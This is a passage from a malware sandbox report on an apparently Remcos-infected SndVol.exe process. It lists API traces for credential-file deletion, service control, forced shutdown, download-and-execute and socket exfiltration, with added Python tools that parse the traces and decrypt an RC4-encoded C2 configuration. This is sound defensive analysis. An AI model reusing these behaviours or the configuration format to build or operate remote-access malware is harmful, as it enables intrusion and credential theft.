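• DeleteFileA.KERNEL32(00000000,\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data), ref: 0292B257
Memory Dump Source
APIs
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02936ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02936AFC
Memory Dump Source
APIs
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02939927
Memory Dump Source
"""
```

Run `analyze(SAMPLE_REPORT)` and the keylogger block (ref 02929A0F) comes back as `hook installed: WH_KEYBOARD_LL`, the clipboard block as `clipboard read: CF_UNICODETEXT` plus `result sent over a socket`, and the service block as `service enumeration: SERVICE_WIN32|SERVICE_DRIVER`. Two caveats when extending the rules. Argument attribution in these bullets is heuristic: GetCurrentProcess takes no parameters, so the 00000028 the report shows against it in the SeShutdownPrivilege block appears to be the TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY (0x20|0x08) access mask that the following OpenProcessToken consumes, and a decoder keyed strictly on (API, argument index) will mis-read it. And "?" marks a value the sandbox could not resolve, so a rule must treat such an argument as unknown rather than zero, which is why `hexarg` returns None instead of a default.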
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 029289AE
                                                                                                                          • Part of subcall function 029241F1: socket.WS2_32(?,00000001,00000006), ref: 02924212
                                                                                                                          • Part of subcall function 0292428C: connect.WS2_32(?,?,?), ref: 029242A5
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02928A8D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 02928AE0
                                                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 02928AF7
                                                                                                                          • Part of subcall function 02924468: WaitForSingleObject.KERNEL32(?,00000000,02921943,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000), ref: 0292450E
                                                                                                                          • Part of subcall function 02924468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,02995B70,02993EE8,00000000,?,?,?,?,?,02921943), ref: 0292453C
                                                                                                                          • Part of subcall function 029247EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 029247FD
                                                                                                                          • Part of subcall function 029247EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924808
                                                                                                                          • Part of subcall function 029247EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,02924B8E,?,?,?,02924B26), ref: 02924811
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02928DA1
                                                                                                                          • Part of subcall function 02924468: send.WS2_32(?,00000000,00000000,00000000), ref: 029244FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4043647387-0
                                                                                                                        • Opcode ID: 960108f995dd30402769f519dfc7571439cc2a725c02acd2f87fed6a17eeb070
                                                                                                                        • Instruction ID: 34c1f2041be8d0b1bcfefcf305d9c63528fb4d2cda377fd3bf6aed134f3acfb5
                                                                                                                        • Opcode Fuzzy Hash: 960108f995dd30402769f519dfc7571439cc2a725c02acd2f87fed6a17eeb070
                                                                                                                        • Instruction Fuzzy Hash: 19A17D329001289BDB18FBA0DC91EEEB77AAF94310F504569E416A70D9EF705E5DCFA0
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0293981A,00000000,00000000), ref: 02939BCD
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0293981A,00000000,00000000), ref: 02939BE2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939BEF
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0293981A,00000000,00000000), ref: 02939BFA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939C0C
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939C0F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 276877138-0
                                                                                                                        • Opcode ID: 1448b59b558753bcc008451cdbef3d767322e417e7e8675e4d1f8a9bf3e61efc
                                                                                                                        • Instruction ID: 064836bf0a71467e13b30121ced55b8bcf10996b886ba9dc51ce5bee0b12e0b0
                                                                                                                        • Opcode Fuzzy Hash: 1448b59b558753bcc008451cdbef3d767322e417e7e8675e4d1f8a9bf3e61efc
                                                                                                                        • Instruction Fuzzy Hash: DAF08272985225AFE2116A74AC88EFF7A6CEF866A1B000859F44593140CFA4CD5D9AB1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02936AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 02936AC4
                                                                                                                          • Part of subcall function 02936AB7: OpenProcessToken.ADVAPI32(00000000), ref: 02936ACB
                                                                                                                          • Part of subcall function 02936AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02936ADD
                                                                                                                          • Part of subcall function 02936AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02936AFC
                                                                                                                          • Part of subcall function 02936AB7: GetLastError.KERNEL32 ref: 02936B02
                                                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 0293595B
                                                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02935970
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02935977
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                        • String ID: PowrProf.dll$SetSuspendState
                                                                                                                        • API String ID: 1589313981-1420736420
                                                                                                                        • Opcode ID: 6fd43c9f9834b6b45be7734d2a290ddbcc9e95b0fd5b80722415eb13e410a75d
                                                                                                                        • Instruction ID: f43a2619d9fb2a7c8af150546331109879d1ebf72e06b6b6858864783a6c975b
                                                                                                                        • Opcode Fuzzy Hash: 6fd43c9f9834b6b45be7734d2a290ddbcc9e95b0fd5b80722415eb13e410a75d
                                                                                                                        • Instruction Fuzzy Hash: 96218260604361D6CA15FBF0E864ABF729FDFC8744F854C19A40AAB18AEF64D81DCB51
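The two function analyses above (the service-start sequence and the SeShutdownPrivilege / ExitWindowsEx / SetSuspendState sequence) are only useful in bulk if the "APIs" lines can be turned into structured records. The following is an added example, not part of the Joe Sandbox report or of the sample: a parser for the `• Api.MODULE(args), ref: ADDR` line format (including the `Part of subcall function ADDR:` prefix), plus a small capability mapping. The capability names and the rule table are my own; the sample input is the two "APIs" blocks shown above, copied verbatim and embedded so the script runs offline.

```python
"""Parse the 'APIs' lines of Joe Sandbox function analyses and map each
function's API set to a coarse capability.  Added example; the rule names
in CAPABILITY_RULES are my own, not Joe Sandbox's."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# '• Api.MODULE(args), ref: ADDR' or '• Api.MODULE ref: ADDR',
# optionally prefixed with 'Part of subcall function ADDR: '
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ARG_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")  # 32-bit stack slots as Joe prints them

# API combinations that together imply a behaviour (assumed mapping, my own names).
CAPABILITY_RULES = {
    "start-service": {"OpenSCManagerW", "OpenServiceW", "StartServiceW"},
    "shutdown-or-suspend-host": {"LookupPrivilegeValueA", "AdjustTokenPrivileges", "ExitWindowsEx"},
    "load-config-from-resource": {"FindResourceA", "LoadResource", "LockResource"},
    "download-and-execute": {"URLDownloadToFileW", "ShellExecuteW"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                       # call-site address in the memory dump
    subcall: Optional[str] = None  # callee address for 'Part of subcall function' lines


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # 'APIs', 'Strings' and other headings are skipped
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module").upper(), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


def split_blocks(text: str) -> List[str]:
    """Each 'APIs' heading starts one function's block."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = []
            blocks.append(cur)
        elif cur is not None:
            cur.append(line)
    return ["\n".join(b) for b in blocks]


def capabilities(calls: List[ApiCall]) -> Set[str]:
    seen = {c.api for c in calls}
    return {name for name, need in CAPABILITY_RULES.items() if need <= seen}


def string_args(calls: List[ApiCall]) -> List[str]:
    """Literal arguments Joe resolved (privilege names, DLL names, export names)."""
    out = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not HEX_ARG_RE.match(a) and a not in out:
                out.append(a)
    return out


def triage(text: str) -> List[dict]:
    result = []
    for block in split_blocks(text):
        calls = parse_api_lines(block)
        result.append({"calls": calls, "capabilities": capabilities(calls),
                       "strings": string_args(calls)})
    return result


# Constructed input: the two 'APIs' blocks from the report above, copied verbatim.
SAMPLE = """APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0293981A,00000000,00000000), ref: 02939BCD
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0293981A,00000000,00000000), ref: 02939BE2
• CloseServiceHandle.ADVAPI32(00000000,?,?,0293981A,00000000,00000000), ref: 02939BEF
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0293981A,00000000,00000000), ref: 02939BFA
APIs
  • Part of subcall function 02936AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 02936AC4
  • Part of subcall function 02936AB7: OpenProcessToken.ADVAPI32(00000000), ref: 02936ACB
  • Part of subcall function 02936AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02936ADD
  • Part of subcall function 02936AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02936AFC
  • Part of subcall function 02936AB7: GetLastError.KERNEL32 ref: 02936B02
• ExitWindowsEx.USER32(00000000,00000001), ref: 0293595B
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02935970
• GetProcAddress.KERNEL32(00000000), ref: 02935977
"""

if __name__ == "__main__":
    for i, r in enumerate(triage(SAMPLE)):
        print(f"function {i}: {len(r['calls'])} calls, "
              f"caps={sorted(r['capabilities'])}, strings={r['strings']}")
```

Joe lists more argument slots than the API prototype has (trailing values such as `0293981A` are stack contents, not parameters), so the parser keeps the raw slots and only the string literals are surfaced; positional decoding of constants should be done per API with the prototype in hand.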
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02971502,?,00000000), ref: 0297127C
                                                                                                                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,02971502,?,00000000), ref: 029712A5
                                                                                                                        • GetACP.KERNEL32(?,?,02971502,?,00000000), ref: 029712BA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                        • Opcode ID: 7bfc6c082323c2a741537e4e4d1cf7abe0b694215c1a96a9377257f84540fad4
                                                                                                                        • Instruction ID: 4346b4eccab091bed8cc0f323dc8296b4adcd836c585db6ae8638c23ce6a50d4
                                                                                                                        • Opcode Fuzzy Hash: 7bfc6c082323c2a741537e4e4d1cf7abe0b694215c1a96a9377257f84540fad4
                                                                                                                        • Instruction Fuzzy Hash: F021C232B04105E7DB34CF94D900BABB3AAEF64A64B468964E90EDB510F732DE40CB90
                                                                                                                        APIs
                                                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0293A650
                                                                                                                        • LoadResource.KERNEL32(00000000,?,?,0292E183,00000000), ref: 0293A664
                                                                                                                        • LockResource.KERNEL32(00000000,?,?,0292E183,00000000), ref: 0293A66B
                                                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0292E183,00000000), ref: 0293A67A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                        • String ID: SETTINGS
                                                                                                                        • API String ID: 3473537107-594951305
                                                                                                                        • Opcode ID: d3ceeebe25f8e8d9a1964b358287d51a18cf6565527000b4b94aca3657a64160
                                                                                                                        • Instruction ID: 295bc709420f8032f0e87783cd4a2fd70dcbdf1ca9c30e1e4e57a7d0194db326
                                                                                                                        • Opcode Fuzzy Hash: d3ceeebe25f8e8d9a1964b358287d51a18cf6565527000b4b94aca3657a64160
                                                                                                                        • Instruction Fuzzy Hash: D1E01A3AA84311EBDB211BA9AC4CDA7BF39FBC67663040866FA05C2214DA318824CB50
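The function above resolves a resource named SETTINGS of type 10 (RT_RCDATA) and reads it with LoadResource / LockResource / SizeofResource; that is where Remcos keeps its configuration. The following is an added example, not code from this report or from the malware: it decodes a SETTINGS blob assuming the layout that public Remcos analyses describe (first byte = RC4 key length, then the key, then the RC4-encrypted configuration with fields separated by `|\x1e\x1e\x1f|`). The page itself confirms only the resource lookup, so that layout, the field order and the sample blob are assumptions; the blob is constructed in the script with the same RC4 routine so it runs offline.

```python
"""Decode a Remcos-style SETTINGS resource.  Added example; the layout
(key-length byte, RC4 key, RC4-encrypted fields separated by FIELD_SEP)
is the publicly documented Remcos format and is NOT confirmed by this
report, which only shows the FindResourceA(SETTINGS, RT_RCDATA) lookup."""
from typing import List

RT_RCDATA = 10                      # resource type 0x0A passed to FindResourceA
FIELD_SEP = b"|\x1e\x1e\x1f|"       # assumed field delimiter of the decrypted config


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    if not key:
        raise ValueError("empty RC4 key")
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def parse_settings(blob: bytes) -> List[bytes]:
    """Split a SETTINGS blob into its decrypted fields; rejects truncated input."""
    if len(blob) < 2:
        raise ValueError("blob too short to hold a key-length byte and a key")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("key length byte does not fit the blob (truncated resource?)")
    key = blob[1:1 + key_len]
    plain = rc4(key, blob[1 + key_len:])
    return plain.split(FIELD_SEP)


def build_settings(key: bytes, fields: List[bytes]) -> bytes:
    """Inverse of parse_settings; used here only to construct the sample blob."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, FIELD_SEP.join(fields))


def c2_field(fields: List[bytes]) -> str:
    """First field, which in Remcos configs conventionally holds host:port:tls (assumption)."""
    return fields[0].decode("latin-1")


# Constructed sample (hypothetical key, hypothetical C2 and settings values).
SAMPLE_KEY = b"examplekey"
SAMPLE_FIELDS = [b"c2.example.invalid:2404:1", b"RemoteHost", b"1", b"", b"MyBot"]
SAMPLE_BLOB = build_settings(SAMPLE_KEY, SAMPLE_FIELDS)

if __name__ == "__main__":
    for n, f in enumerate(parse_settings(SAMPLE_BLOB)):
        print(f"field {n}: {f!r}")
```

On a real dump the blob is the RT_RCDATA entry named SETTINGS; with `pefile` it can be read from `pe.DIRECTORY_ENTRY_RESOURCE` and passed straight to `parse_settings`. Because the key is stored in the resource itself, no brute force is needed; a failed decode almost always means the unpacked image was captured before the resource section was fully written.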
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029305B9: SetLastError.KERNEL32(0000000D,02930B38,?,00000000), ref: 029305BF
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02930B15), ref: 02930BC4
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 02930C2A
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02930C31
                                                                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02930D3F
                                                                                                                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02930B15), ref: 02930D69
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3525466593-0
                                                                                                                        • Opcode ID: 86e69f22422a05fbd82cfcea1bb433018fc9759ff3bbd4e0e058eb95d0d78f33
                                                                                                                        • Instruction ID: 68a6fbd22d49f2cb852e8f90a40b96be262dbefcb2e28195d9004b0ff4f18812
                                                                                                                        • Opcode Fuzzy Hash: 86e69f22422a05fbd82cfcea1bb433018fc9759ff3bbd4e0e058eb95d0d78f33
                                                                                                                        • Instruction Fuzzy Hash: FF61E370600305ABDB22EF65CD84B6BBBEAFF84704F444059ED09CB685EBB5E854CB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02966EBF: GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
                                                                                                                          • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966EF6
                                                                                                                          • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
                                                                                                                          • Part of subcall function 02966EBF: _abort.LIBCMT ref: 02966F3D
                                                                                                                          • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966F1E
                                                                                                                          • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F2B
                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 029714C3
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0297151E
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0297152D
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,02963CEC,00000040,?,02963E0C,00000055,00000000,?,?,00000055,00000000), ref: 02971575
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,02963D6C,00000040), ref: 02971594
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 745075371-0
                                                                                                                        • Opcode ID: e8b871d3590c48568b704bc6c4421c70b48483840666ff9941daadca13154c91
                                                                                                                        • Instruction ID: 3b056b9e8b9d9a3f534362aa5950eb098f0403f7f152431063c79a3baca07840
                                                                                                                        • Opcode Fuzzy Hash: e8b871d3590c48568b704bc6c4421c70b48483840666ff9941daadca13154c91
                                                                                                                        • Instruction Fuzzy Hash: F0515D72A00209ABEF20DFA5CC44BBAB7BDBF48704F044579E95DEB190E7749A44CB61
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 02927A91
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,02985AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B4A
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B6E
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927C76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157919129-0
                                                                                                                        • Opcode ID: 6313f19ffe05eaf3f80981d619adc17df9cee449833bb371a0533e71fcfdecad
                                                                                                                        • Instruction ID: effaf1a14fba9370f829820f98e9727ee2f077ccad48cf731417d7920edf5dd2
                                                                                                                        • Opcode Fuzzy Hash: 6313f19ffe05eaf3f80981d619adc17df9cee449833bb371a0533e71fcfdecad
                                                                                                                        • Instruction Fuzzy Hash: 745194329001189BDF14FBB4DC959EEBB7AAF94310F800159E80AA3199EF349B5DCF90
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0297D478), ref: 02968079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0299179C,000000FF,00000000,0000003F,00000000,?,?), ref: 029680F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,029917F0,000000FF,?,0000003F,00000000,?), ref: 0296811E
                                                                                                                        • _free.LIBCMT ref: 02968067
                                                                                                                          • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
                                                                                                                          • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
                                                                                                                        • _free.LIBCMT ref: 02968233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: d10f36abea7f7e28fbb26b787c576417ff205666067b3323d5b5d9ccedf70433
                                                                                                                        • Instruction ID: 84d47c7e17a53fd618706baba2acf4d9de98b4a17406a1d1e7f32b152b26e2d3
                                                                                                                        • Opcode Fuzzy Hash: d10f36abea7f7e28fbb26b787c576417ff205666067b3323d5b5d9ccedf70433
                                                                                                                        • Instruction Fuzzy Hash: D151FD71D0420AABCB10DFA9DC889FAB7FDFF84364F110A6AE46897290E7315E55CB50
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02926234
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02926318
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: DownloadExecuteFileShell
• String ID: C:\Windows\SysWOW64\SndVol.exe$open
• API String ID: 2825088817-1291576107
• Opcode ID: ff4b27fd1456990ff7d5d75375826293104bd5b079b782d179c5a13567893c50
• Instruction ID: ef6559cddcd5126d525621d3f687c9aeaa191bfc912b6de4ee5ca86d4d5e8a65
• Opcode Fuzzy Hash: ff4b27fd1456990ff7d5d75375826293104bd5b079b782d179c5a13567893c50
• Instruction Fuzzy Hash: B061333260436097DE14FA74E8649BE77AB9FC1710F41091EE88A571CDEF24DA1CCA93
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0293BC6C
  • Part of subcall function 029326D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 029326E1
  • Part of subcall function 029326D2: RegSetValueExA.KERNELBASE(?,02986748,00000000,?,00000000,00000000,029942F8,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932709
  • Part of subcall function 029326D2: RegCloseKey.KERNELBASE(?,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932714
Strings
Memory Dump Source
• Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
• Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 08eecf621f2b93b713da10b43defbc99f11c6f4afdde234a47730ee54eb4c65c
• Instruction ID: 0325abd066cac6052cce125294effea154e2c077407ab64cb1714e4237ff3b63
• Opcode Fuzzy Hash: 08eecf621f2b93b713da10b43defbc99f11c6f4afdde234a47730ee54eb4c65c
• Instruction Fuzzy Hash: D8119323B8021027F819313D4E3BB6E290797D6A28F8D0119E6036A6DBD9864A6503C2
APIs
  • Part of subcall function 02966EBF: GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
  • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966EF6
  • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
  • Part of subcall function 02966EBF: _abort.LIBCMT ref: 02966F3D
